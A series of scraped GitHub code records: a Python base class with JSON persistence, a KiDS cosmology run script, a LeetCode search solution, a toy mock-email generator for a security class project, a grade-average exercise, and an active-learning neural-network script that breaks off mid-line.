+{"seq_id":"50212429","text":"#!/usr/bin/python3\n'''Module for Base class'''\nimport json\n\n\nclass Base:\n '''\n Base class will be the “base” of all other classes in this project.\n It will manage the id attribute in all future classes\n to avoid duplicating the same code\n '''\n __nb_objects = 0\n\n def __init__(self, id=None):\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n if list_dictionaries is None or list_dictionaries == []:\n return (\"[]\")\n else:\n return (json.dumps(list_dictionaries))\n\n @classmethod\n def save_to_file(cls, list_objs):\n if list_objs is None or list_objs == []:\n content = []\n else:\n content = [cls.to_dictionary(obj) for obj in list_objs]\n cl_name = cls.__name__\n f_name = f\"{cl_name}.json\"\n\n with open(f_name, 'w') as my_file:\n my_file.write(cls.to_json_string(content))\n\n @staticmethod\n def from_json_string(json_string):\n if json_string is None or json_string == \"[]\":\n return ([])\n else:\n return (json.loads(json_string))\n\n @classmethod\n def create(cls, **dictionary):\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 2)\n else:\n dummy = cls(1)\n dummy.update(**dictionary)\n return (dummy)\n\n @classmethod\n def load_from_file(cls):\n f_nm = f\"{cls.__name__}.json\"\n inst_l = []\n try:\n with open(f_nm, 'r') as myf:\n content = cls.from_json_string(myf.read())\n for elmt in content:\n inst = cls.create(**elmt)\n inst_l.append(inst)\n except FileNotFoundError:\n pass\n return 
(inst_l)\n","repo_name":"samuelolushegun/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42466581656","text":"import subprocess\nimport numpy as np\n\nif __name__ == \"__main__\":\n script = \"utils/run_kcap.py\"\n \n # Cosmic shear + GGL twopoint file\n twopoint_file_template = \"../Cat_to_Obs_K1000_P1/data/kids/fits_iterative_covariance/bp_KIDS1000_Blind{blind}_with_m_bias_V1.0.0A_ugriZYJHKs_photoz_SG_mask_LF_svn_309c_2Dbins_v2_goldclasses_Flag_SOM_Fid.fits\"\n\n # Covariance of the n(z)\n dz_cov_file = \"../Cat_to_Obs_K1000_P1/data/kids/nofz/SOM_cov_multiplied.asc\"\n dz_mean_file = \"../Cat_to_Obs_K1000_P1/data/kids/nofz/deltaz.asc\"\n \n # Compute the decorrelated dz mean shifts\n dz_cov = np.loadtxt(dz_cov_file)\n dz_mean = np.loadtxt(dz_mean_file)\n L = np.linalg.cholesky(dz_cov) \n L_inv = np.linalg.inv(L)\n dx_mean = L_inv @ dz_mean\n\n # BOSS files\n boss_data_files = [\"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.lowz.3xiwedges_measurements.txt\",\n \"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.highz.3xiwedges_measurements.txt\"]\n boss_cov_files = [\"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.lowz.3xiwedges_covmat.txt\",\n \"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.highz.3xiwedges_covmat.txt\"]\n\n\n multinest_settings = [\"--sampler-config\", \"multinest_efficiency\", \"0.3\",\n \"--sampler-config\", \"nested_sampling_tolerance\", \"1.0e-2\",\n \"--sampler-config\", \"live_points\", \"500\", \n ]\n\n timeout_setttings = [\"--set-keys\", \"wedges\", \"timeout\", \"600.0\"]\n\n nE_scale_cuts = [\"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_1\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_2\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_3\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_4\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_5\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_1\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_2\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_3\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_4\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_5\", \"100 600\",]\n\n Planck_settings = [\"--enable-modules\", \"planck_like\",\n \"--set-keys\", \"camb\", \"mode\", \"cmb\",\n \"--set-keys\", \"camb\", \"lmax\", \"2650\",\n \"--set-keys\", \"camb\", \"nonlinear\", \"both\",\n \"--set-keys\", \"camb\", \"do_lensing\", \"T\",\n \"--set-keys\", \"camb\", \"do_reionization\", \"T\",\n # Planck TTTEEE+lowl+lowE 5 sigma ranges, with S8 and ns having a 7 sigma lower range and h having a 7 sigma upper range.\n \"--set-parameters\", \"cosmological_parameters\", \"omch2\", \"0.11336956221293837 0.12 0.12703091064106695\",\n \"--set-parameters\", \"cosmological_parameters\", \"ombh2\", \"0.021615770756319073 0.0225 0.023103729722525095\",\n \"--set-parameters\", \"cosmological_parameters\", \"h0\", \"0.6425290065540109 0.7 0.7150188763839126\",\n \"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9342806461291905 0.97 0.986698010466018\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"0.7229290272333152 0.7458 0.9134139168266714\",\n \"--set-parameters\", 
\"cosmological_parameters\", \"tau\", \"0.015070795999054837 0.0543 0.09381939280201967\",\n \"--set-parameters\", \"planck\", \"a_planck\", \"0.9879083109867925 1.000610 1.0130810744845216\",\n \"--set-priors\", \"planck\", \"a_planck\", \"gaussian 1.0 0.0025\",]\n\n\n # Cosmology chains\n root_dir = \"runs/3x2pt/data_iterated_cov/cosmology/\"\n\n blinds = [] \n run_types = [\"EE\", \"EE_nE\", \"EE_w\"]\n\n use_Planck = [False]\n\n for blind in blinds:\n print(f\"Blind {blind}\")\n twopoint_file = twopoint_file_template.format(blind=blind)\n\n for run_type in run_types:\n print(f\" Run type: {run_type}\")\n\n for with_Planck in use_Planck:\n print(f\" Include Planck: {with_Planck}\")\n\n for sampler in [\"test\", \"multinest\"]:\n run_name_root = sampler\n\n run_name = f\"{run_name_root}_blind{blind}_{run_type}\"\n if with_Planck:\n run_name += \"_Planck\"\n\n # Base setup\n cmd = [\"--root-dir\", root_dir,\n \"--run-name\", run_name,\n \"--run-type\", run_type,\n \"--KiDS-data-file\", twopoint_file,\n \"--dz-covariance-file\", dz_cov_file,\n \"--BOSS-data-files\", *boss_data_files,\n \"--BOSS-covariance-files\", *boss_cov_files,\n \"--sampler\", sampler,]\n\n # dz prior means\n for i, m in enumerate(dx_mean):\n cmd += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n cmd += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n # GGL scale cuts\n if \"nE\" in run_type:\n cmd += nE_scale_cuts\n\n # Add Planck likelihood\n if with_Planck:\n cmd += Planck_settings\n\n # sampler settings\n if sampler == \"multinest\":\n cmd += multinest_settings\n\n if \"w\" in run_type:\n # Allow wedges to time out\n cmd += timeout_setttings\n\n # cmd += [\"--overwrite\"]\n\n subprocess.run([\"python\", script] + cmd, check=True)\n\n\n # Systematics chains\n root_dir = \"runs/3x2pt/data_iterated_cov_fast_extra/systematics/\"\n\n # Configs for tomographic bin cuts\n tomographic_bin_cut_configs = []\n for cut_bin in [[0], [1], [2], [3], [4], [0,1]]:\n cut_tomographic_EE = [f\"{i+1}+{j+1}\" for i in range(5) for j in range(i,5) if i in cut_bin or j in cut_bin]\n cut_tomographic_nE = [f\"{i+1}+{j+1}\" for i in range(2) for j in range(5) if j in cut_bin]\n\n for extra_GGL_cut in [\"1+1\", \"2+1\", \"2+2\", \"2+3\"]:\n if extra_GGL_cut not in cut_tomographic_nE:\n cut_tomographic_nE.append(extra_GGL_cut)\n\n # Covariance of the n(z)\n cut_bin_str = '_'.join([str(c+1) for c in cut_bin])\n dz_cut_bin_cov_file = f\"../Cat_to_Obs_K1000_P1/data/kids/nofz/SOM_cov_multiplied_bin{cut_bin_str}_removed.asc\"\n \n # Compute the decorrelated dz mean shifts\n dz_cut_bin_cov = np.loadtxt(dz_cut_bin_cov_file)\n L_cut_bin = np.linalg.cholesky(dz_cut_bin_cov) \n L_cut_bin_inv = np.linalg.inv(L_cut_bin)\n dx_cut_bin_mean = L_cut_bin_inv @ dz_mean\n\n parameter_settings = []\n for i, m in enumerate(dx_cut_bin_mean):\n if i in cut_bin:\n parameter_settings += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"{m}\"]\n else:\n parameter_settings += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n parameter_settings += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n config = [\"--set-keys\", \"scale_cuts\", \"cut_pair_PeeE\", \" \".join(cut_tomographic_EE),\n \"--set-keys\", \"scale_cuts\", \"cut_pair_PneE\", \" \".join(cut_tomographic_nE)]\n config += [\"--dz-covariance-file\", dz_cut_bin_cov_file]\n\n config += parameter_settings\n\n tomographic_bin_cut_configs.append((f\"cut_z_bin_{''.join([str(c+1) for c in cut_bin])}\", 
config))\n\n no_baryon_configs = [(\"no_baryon\", [\"--set-parameters\", \"halo_model_parameters\", \"A\", \"3.13\"]),]\n\n no_higher_order_configs = [# (\"fix_ho_bias\", [\"--set-parameters\", \"bias_parameters\", \"b2_bin_1\", \"0.2\",\n # \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_1\", \"0.9\",\n # \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_1\", \"3.8\",\n # \"--set-parameters\", \"bias_parameters\", \"b2_bin_2\", \"0.5\",\n # \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_2\", \"0.1\",\n # \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_2\", \"3.0\",]),\n (\"zero_ho\", [\"--set-keys\", \"wedges\", \"local_lag_g2\", \"F\",\n \"--set-parameters\", \"bias_parameters\", \"b2_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma2_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"b2_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma2_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_2\", \"0.0\",])]\n\n ns_prior_configs = [(\"fix_ns\", [\"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9658923\",]),\n (\"narrow_ns_prior\", [\"--set-priors\", \"cosmological_parameters\", \"n_s\", \"gaussian 0.96 0.02\",])]\n\n As_prior_configs = [(\"fix_As\", [\"--set-parameters\", \"cosmological_parameters\", \"A_s\", \"2.1e-9\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"0.0\",\n #\"--enable-modules\", \"sample_ln_As\",\n \"--cut-modules\", \"sample_S8\",\n \"--cut-modules\", \"sigma8toAs\"]),]\n\n As_ns_prior_configs = [(\"fix_As_ns\", [\"--set-parameters\", \"cosmological_parameters\", \"A_s\", \"2.1e-9\",\n \"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9658923\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"none\",\n \"--cut-modules\", \"sample_S8\",\n \"--cut-modules\", \"sigma8toAs\"]),]\n\n w_scale_cuts_config = [(\"w_smax75\", [\"--set-keys\", \"wedges\", \"bands_range\", \"20 75\",\n \"--set-keys\", \"wedges\", \"points_range\", \"4 15\",\n \"--set-keys\", \"BOSS_like\", \"points_range\", \"4 15\"]),\n (\"w_smax100\", [\"--set-keys\", \"wedges\", \"bands_range\", \"20 100\",\n \"--set-keys\", \"wedges\", \"points_range\", \"4 20\",\n \"--set-keys\", \"BOSS_like\", \"points_range\", \"4 20\"])]\n\n configs = As_ns_prior_configs #+ ns_prior_configs + w_scale_cuts_config #no_higher_order_configs + tomographic_bin_cut_configs + no_baryon_configs\n \n blinds = [\"C\"]\n for blind in blinds:\n print(f\"Blind {blind}\")\n twopoint_file = twopoint_file_template.format(blind=blind)\n\n run_type = \"EE\"\n print(f\" Run type: {run_type}\")\n\n for config_name, config in configs:\n print(f\" Config: {config_name}\")\n for sampler in [\"test\", \"multinest\"]:\n run_name_root = sampler\n\n run_name = f\"{run_name_root}_blind{blind}_{run_type}_{config_name}\"\n\n # Base setup\n cmd = [\"--root-dir\", root_dir,\n \"--run-name\", run_name,\n \"--run-type\", run_type,\n \"--KiDS-data-file\", twopoint_file,\n \"--BOSS-data-files\", *boss_data_files,\n \"--BOSS-covariance-files\", *boss_cov_files,\n \"--sampler\", sampler,] \n\n # GGL scale cuts\n if \"nE\" in run_type:\n cmd += nE_scale_cuts\n\n if not \"cut_z_bin\" in config_name:\n cmd += [\"--dz-covariance-file\", dz_cov_file]\n # dz prior means\n for i, 
m in enumerate(dx_mean):\n cmd += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n cmd += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n cmd += config\n\n # sampler settings\n if sampler == \"multinest\":\n cmd += multinest_settings\n\n # Allow wedges to time out\n if \"w\" in run_type:\n cmd += timeout_setttings\n\n # cmd += [\"--overwrite\"]\n\n subprocess.run([\"python\", script] + cmd, check=True)","repo_name":"KiDS-WL/kcap","sub_path":"runs/3x2pt/3x2pt_configs.py","file_name":"3x2pt_configs.py","file_ext":"py","file_size_in_byte":13513,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"22886526265","text":"class Solution:\n def search(self, nums, target):\n pivot = self.find_pivot(nums, 0, len(nums) // 2)\n left_search = self.binary_search(nums, target, 0, pivot - 1)\n right_search = self.binary_search(nums, target, pivot, len(nums) - 1)\n\n if left_search == -1 and right_search == -1:\n return -1\n elif left_search != -1:\n return left_search\n else:\n return right_search\n \n def find_pivot(self, nums, left, right):\n if right == 0:\n return right\n if left == len(nums) - 1:\n return left\n if nums[right - 1] > nums[right]:\n return right\n\n if nums[left] > nums[right]: # is already pivoted\n return self.find_pivot(nums, left, (left + right) // 2)\n else:\n return self.find_pivot(nums, right, (right + len(nums)) // 2)\n\n \n def binary_search(self, nums, target, left, right):\n if right >= left:\n mid = (left + right) // 2\n\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n return self.binary_search(nums, target, left, mid-1)\n else:\n return self.binary_search(nums, target, mid+1, right)\n else:\n return -1\n \nsolution = Solution()\n\n# Idea: \n# Find pivoted index\n# Run binary search again on left side and right of nums\n\nprint(solution.search([4,5,6,7,0,1,2], 0))\nprint(solution.search([4,5,6,7,0,1,2], 3))\nprint(solution.search([1], 0))","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15323768738","text":"from Mail import Mail\nimport time\nimport random\n\nemail_names = [\"ryan\", \"ryan.yoak\", \"sam\", \"AOL\", \"badactor\", \"delozier\", \"awesomeness\", \"Wizard\"]\nemail_ats = [\"gmail.com\", \"aol.com\", \"yahoo.com\", \"kent.edu\", \"sanyo.org\", \"ghost.cs.kent\"]\n\nsubject_safe = [\n \"Hello from us\",\n \"How waz the trip\",\n \"Help with the project\",\n \"Have you seen that video yet?\",\n \"Covid-19 update\",\n \"How we, a buisness, are responding to covid-19\",\n \"Very save email header\",\n \"Noting suspicios here\"]\n\nsubject_malitious = [\n \"urgent action neded\",\n \"Please fill out this form\",\n \"Data breach detected\",\n \"Plese help me wit all this money\"]\n\nbody_safe = [\n \"I need help getting my grades up...\",\n \"How was the trip, we missed you\",\n \"Computer security middterm\",\n \"Dungeons and Dragons Schedueling\"]\n\nbody_malitious = [\n \"[text](link) Use this link to give us all your money\",\n \"respond Immediately, we need all your money right now.\",\n \"Banking account information needed\",\n \"Revised Vacation & Sick Time Policy\",\n \"Very important info inside\",\n \"Netflix is our company and we are Netflix\",\n \"We are apple so respond Immediatly\"]\n\ndef getMail(time):\n safe = random.choice([-1, 0, 
1])\n if safe == 1:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_safe), random.choice(body_safe), time, None), safe)\n if safe == -1:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_malitious), random.choice(body_malitious), time, None), safe)\n else:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_safe + subject_malitious), random.choice(body_safe + body_malitious), time, None), safe)\n","repo_name":"RyanYoak/Information-Security-Project","sub_path":"TestMail.py","file_name":"TestMail.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16738437111","text":"# Create a program that reads two grades of a student and computes the average, showing a message at the end according to the average achieved:\n# - Average below 5.0: FAILED\n# - Average between 5.0 and 6.9: RETAKE\n# - Average 7 or higher: PASSED\n\nnota1 = float(input(\"What was your first grade? \"))\nnota2 = float(input(\"What was your second grade? \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(f\"Your average was {media:.2f}!\")\nif media < 5:\n print(\"You did not reach the passing average! Unfortunately, you FAILED!\")\nelif media >= 5 and media <= 6.9:\n print(\"You did not reach the passing average, but you will get another chance! You are in RETAKE!\")\nelse:\n print(\"Congratulations, your grade was above the average! You PASSED!\")","repo_name":"luizfiliperm/Exercicios-Curso-Em-Video","sub_path":"mundo02/ex040.py","file_name":"ex040.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"16147476328","text":"#!/usr/bin/python\n# coding: utf-8\n\nimport logging\nimport tensorflow as tf\nimport pickle\nimport time\nimport numpy as np\n\nfrom .adaptive.adaptive_nn import (ActiveNeuralNetwork,\n compute_score,\n TrueActiveNN)\nfrom .visualize_database import (plot_advancement_qdb_search,\n random_advancement_plot,\n plot_advancement_uncertainty_search,\n random_uncertainty_plot)\nfrom .sampling import initial_sampling, uncertainty_sampling\nfrom .qdbsampling import qdb_sampling, qdb_sampling_dependant\nimport tf_utils as utils\n\n\ndef active_search(X, y, shapes=[64, 1], max_iterations=501,\n pos_weights_path=\"./weights_pos.pckl\",\n neg_weights_path=\"./weights_neg.pckl\",\n main_weights_path=\"./weights_main_%s_iterations.pckl\",\n display_plot=True, plot_save_path=None, n_points=None,\n callback_save_path=None, nb_max_main_epoch=64000, qdb=True,\n random=True, xlim=None, ylim=None, timer_save_path=None,\n save_biased=True, include_background=False,\n evolutive_small=False, nb_background_points=None,\n nb_biased_epoch=10000, biased_lr=0.001,\n reduce_factor=2., pool_size=None,\n main_lr=0.001, nn_activation=\"relu\",\n nn_loss=\"binary_crossentropy\",\n background_sampling=\"uncertain\", doubleFilters=False):\n \"\"\"\n Run the active search with neural networks.\n\n Params:\n X (np.array): Data on which the data exploration will be done.\n y (np.array): Searched labels.\n shapes (list of integers): shapes of the nn used.\n max_iterations (integer): maximum number of iterations.\n pos_weights_path (string): where to save the positively biased weights.\n neg_weights_path (string): where to save the negatively biased weights.\n main_weights_path (string): where to save the weights of the main nn.\n
display_plot (boolean): Shall the script display the advancement plots?\n plot_save_path (string): Where to save the advancement plots. If None,\n the plots will not be saved.\n n_points (integer): Number of points to plot. If None, every point\n will be plotted.\n callback_save_path (string): Where to save the callbacks. If None,\n the callbacks will not be saved.\n nb_max_main_epoch (int): maximum number of epochs for the main neural\n network during one step.\n qdb (boolean): If True, use query by disagreement to choose the new\n sample. Else, use uncertainty sampling.\n random (boolean): If True, take a random sample in the disagreement\n region. Else, take the most uncertain. Not applicable if not qdb.\n xlim (2-uple of integers): limits of the x axis.\n ylim (2-uple of integers): limits of the y axis.\n timer_save_path (string): where to save the follow-up of the execution\n time. If None, it will not be saved.\n save_biased (boolean): If True, will save weights of positive and\n negative nns.\n include_background (boolean): If True, the stopping criterion of biased\n nns will include background points.\n evolutive_small (boolean): Choose if the number of background points\n will change over time or not.\n nb_background_points (int): If evolutive_small, the number of\n background points will be set to nb_background_points times the\n number of labeled points. Else, it will sample nb_background_points\n at each step. The default value (when set to None) is 2 with\n evolutive_small and 200 without evolutive_small. \n nb_biased_epoch (integer): Number of epochs to do at the first step.\n biased_lr (real): Learning rate of biased neural networks.\n reduce_factor (real or string): The gradients of the biased sample will\n be divided by this factor. If None, it will be equal to\n len(biased_sample). If \"evolutive\", it will be equal to\n len(biased_samples) * 2. / X_train.shape[0].\n pool_size (integer): Size of the pool considered to find the most\n uncertain point. If None, the whole X is used.\n main_lr (real): Learning rate of the main model.\n nn_activation (string): activation functions of the neural networks\n nn_loss (string): loss of the neural networks\n background_sampling (string): If \"uncertain\", background points will be\n the most uncertain of the model. 
If \"random\", background points\n will be randomly sampled.\n doubleFilters (boolean): In the case of the biased neural network load\n the weights of the main nn at each step, these biased nns will have\n two times more parameters if doubleFilter is set to True.\n \"\"\"\n\n # Initialize variables\n\n timer = {\"sampling\": [],\n \"total\": [],\n \"main_nn\": [],\n \"iterations\": [],\n \"predictions\": [],\n \"saving_weights\": [],\n \"callback_treatment\": [],\n \"plots\": [],\n \"callback_save\": [],\n \"timer_save\": []}\n\n if qdb:\n for key in [\"background_points\", \"pos_nn\", \"neg_nn\",\n \"disagreement_point\"]:\n timer[key] = []\n\n t0 = time.time()\n graph_main = tf.Graph()\n input_shape = X.shape[1]\n\n reduce_factor_pos = reduce_factor\n reduce_factor_neg = reduce_factor\n\n current_lr = main_lr\n\n with graph_main.as_default():\n nn_main = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n\n if qdb and (pos_weights_path != main_weights_path):\n graph_pos = tf.Graph()\n graph_neg = tf.Graph()\n \n with graph_pos.as_default():\n nn_pos = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n with graph_neg.as_default():\n nn_neg = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n\n with tf.Session(graph=graph_main) as sess_main:\n\n tf.set_random_seed(42)\n sess_main.run(tf.global_variables_initializer())\n nb_epoch_main = 1000\n\n stopping_criterion = False\n # Loop over the iterations\n for iteration in range(2, max_iterations):\n\n if stopping_criterion:\n break\n\n t = time.time()\n timer[\"total\"].append(t - t0)\n\n logging.info(\"# Iteration %s #\" % iteration)\n\n if not evolutive_small:\n reduce_factor_pos = min(max(1, reduce_factor_pos * 0.9), 200)\n reduce_factor_neg = min(max(1, reduce_factor_neg * 0.9), 200)\n\n logging.info(\"reduce_factor pos %s neg %s\" % (reduce_factor_pos,\n reduce_factor_neg))\n\n # Test if it is the first iteration\n if iteration == 2:\n\n # Randomly sample one positive and one negative example\n samples = initial_sampling(y)\n X_train, y_train = X[samples], y[samples]\n\n uncertain_samples = range(X.shape[0])\n for i in samples:\n uncertain_samples.remove(i)\n X_val, y_val = X[uncertain_samples], y[uncertain_samples]\n\n tbis = time.time()\n timer[\"sampling\"].append(tbis - t)\n t = tbis\n logging.info(\"Initial sampling done\")\n\n # Train the neural network\n callback = nn_main.training(sess_main, X_train, y_train,\n n_epoch=100000, display_step=1000,\n stop_at_1=True, saving=False)\n\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n\n callback[\"samples\"] = samples\n\n tbis = time.time()\n timer[\"main_nn\"].append(tbis - t)\n t = tbis\n\n # First prediction\n old_pred = sess_main.run(\n nn_main.prediction,\n feed_dict={nn_main.input_tensor: X_val}\n )\n\n tbis = time.time()\n timer[\"predictions\"].append(tbis - t)\n t = tbis\n\n val_score = compute_score(nn_main, X, y, sess_main)\n logging.info(\"Validation F1 score: %s\" % val_score)\n\n callback[\"validation_error\"] = [val_score]\n callback[\"training_error\"] = [callback[\"training_error\"][-1]]\n\n tbis = time.time()\n 
timer[\"callback_treatment\"].append(tbis - t)\n timer[\"iterations\"].append(t - timer[\"total\"][-1] - t0)\n\n else:\n repeat = True\n while repeat:\n repeat = False\n if qdb:\n if (main_weights_path != pos_weights_path):\n (sample, pred_pos, pred_neg, biased_samples, times,\n reduce_factor_pos_new, reduce_factor_neg_new) = (\n qdb_sampling(nn_main, sess_main, X_train, y_train,\n X_val, y_val, iteration, nn_pos,\n graph_pos, pos_weights_path, nn_neg,\n graph_neg, neg_weights_path,\n random=random, save=save_biased,\n evolutive_small=evolutive_small,\n nb_background_points=nb_background_points,\n nb_biased_epoch=nb_biased_epoch,\n reduce_factor_pos=reduce_factor_pos,\n reduce_factor_neg=reduce_factor_neg,\n pool_size=pool_size)\n )\n else:\n (sample, pred_pos, pred_neg, biased_samples, times,\n reduce_factor_pos_new, reduce_factor_neg_new) = (\n qdb_sampling_dependant(nn_main, sess_main, X_train, y_train,\n X_val, y_val, iteration, main_weights_path,\n random=random, save=save_biased,\n evolutive_small=evolutive_small,\n nb_background_points=nb_background_points,\n nb_biased_epoch=nb_biased_epoch,\n reduce_factor_pos=reduce_factor_pos,\n reduce_factor_neg=reduce_factor_neg,\n pool_size=pool_size,\n doubleFilters=doubleFilters)\n )\n modif_pos = (reduce_factor_pos_new != reduce_factor_pos)\n modif_neg = (reduce_factor_neg_new != reduce_factor_neg)\n\n reduce_factor_pos = reduce_factor_pos_new\n reduce_factor_neg = reduce_factor_neg_new\n\n for i, key in enumerate([\n \"background_points\", \"pos_nn\", \"neg_nn\",\n \"disagreement_point\"\n ]):\n timer[key].append(times[i])\n else:\n sample = uncertainty_sampling(nn_main, sess_main,\n X_val,\n pool_size=pool_size)\n\n X_train = np.vstack((X_train,\n X_val[sample].reshape((1, -1))))\n y_train = np.vstack((y_train,\n y_val[sample].reshape((1, 1))))\n\n if qdb:\n if samples == 0:\n biased_samples = [i - 1 for i in biased_samples]\n elif sample != (X_val.shape[0] - 1):\n biased_samples = [i - 1 if i > sample else i\n for i\n in biased_samples]\n\n for variable in [X_val, y_val, pred_pos, pred_neg,\n old_pred]:\n variable = np.delete(variable, sample, 0)\n else:\n for variable in [X_val, y_val]:\n variable = np.delete(variable, sample, 0)\n\n tbis = time.time()\n timer[\"sampling\"].append(tbis - t)\n t = tbis\n\n logging.info(\"New sample is %s\" % bool(y_train[-1]))\n\n # Train the main nn with the new samples\n logging.info(\"Training main model\")\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=nb_epoch_main,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True,\n )\n\n tbis = time.time()\n timer[\"main_nn\"].append(tbis - t)\n t = tbis\n\n # Save the weights\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n\n tbis = time.time()\n timer[\"saving_weights\"].append(tbis - t)\n t = tbis\n\n callback[\"training_error\"].append(temp[\"training_error\"][-1])\n\n # If the model did not converge, increase maximum training time\n # next time\n if (callback[\"training_error\"][-1] < 0.95):\n if (2 * nb_epoch_main) >= nb_max_main_epoch:\n nb_epoch_main = nb_max_main_epoch\n else:\n nb_epoch_main *= 2\n\n # adapt reduce_factor\n if modif_pos and modif_neg:\n nn_main.increase_complexity(sess_main)\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=nb_epoch_main * 10,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True, decrease=False\n )\n if 
temp[\"training_error\"][-1] < 0.95:\n logging.info(\"RESET !\")\n sess_main.run(tf.global_variables_initializer())\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=100000,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True, decrease=False\n )\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n if main_weights_path != pos_weights_path:\n with tf.Session(graph_pos) as sess_pos:\n nn_pos.increase_complexity(sess_pos)\n with tf.Session(graph_neg) as sess_neg:\n \n nn_neg.increase_complexity(sess_neg)\n if ((iteration>3) and ((callback[\"training_error\"][-1] != 1) or \n (callback[\"training_error\"][-2] != 1))):\n if modif_pos:\n reduce_factor_pos /= 2.\n if modif_neg:\n reduce_factor_neg /= 2.\n\n tbis = time.time()\n timer[\"callback_treatment\"].append(tbis - t)\n t = tbis\n\n val_score = compute_score(nn_main, X, y, sess_main)\n callback[\"validation_error\"].append(val_score)\n\n logging.info(\"Validation F1 score: %s\" % val_score)\n tbis = time.time()\n timer[\"predictions\"].append(tbis - t)\n t = tbis\n\n stopping_criterion = (val_score > 0.99)\n\n if (display_plot or (plot_save_path is not None)):\n # Predict with current model\n new_pred = sess_main.run(\n nn_main.prediction,\n feed_dict={nn_main.input_tensor: X_val}\n )\n\n # Plot the progress\n psp = 